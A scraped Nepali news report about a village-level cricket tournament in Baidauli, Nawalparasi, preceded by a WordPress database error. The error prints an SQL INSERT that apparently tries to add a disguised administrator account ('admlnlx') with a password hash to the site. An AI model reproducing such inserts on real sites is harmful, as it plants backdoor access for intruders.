WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQHyha4qkQsIO6gtU./x7XSaXbravH1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 16:58:46', '', 'admlnlx', 'admlnlx')
सहबान अन्सारी,
नवलपरासी, माघ १७–
नवलपरासीको बैदौलमा गाविस स्तरिय क्रिकेट प्रतियोगीता आजबाट सुरु भएको छ । ‘स्वास्थ्यको लागी खेलकुद, राष्ट्रको लागी खेलकुद’ भन्ने नारा सहित बैदौली युवा संजालको आयोजनामा गाविस स्तरीय क्रिकेट प्रतियोगीता सुरु भएको हो । प्रतियोगिताको आज एक कार्यक्रमकाबीच समाजसेवी सुरज शाहले उद्घाटन गर्नुभयो । कार्यक्रममा गाविस सचिव भगवती प्रसाद कुर्मी, बैदौली प्रहरी चौकीका ईन्चार्ज अरुणकुमार महतो सशस्त्र सिमा बलका कमल बस्नेत, दिपनारायण गौड, उमाशंकर कुर्मी, अलि अन्सारी, राज्श सिहं, रामाशंकर राजभर लगायत हरुको सहभागिता रहेको थियो ।
प्रतियोगीतामा गाविसभरका १६ टिमको सहभागिता रहेको छ । बिजयी टिमलाई १५ हजार नगदसहित शिल्ड र मेडल तथा उपबिजेतालाई १० हजार नगद सहित शिल्ड र मेडल प्रदान गरिने छ ।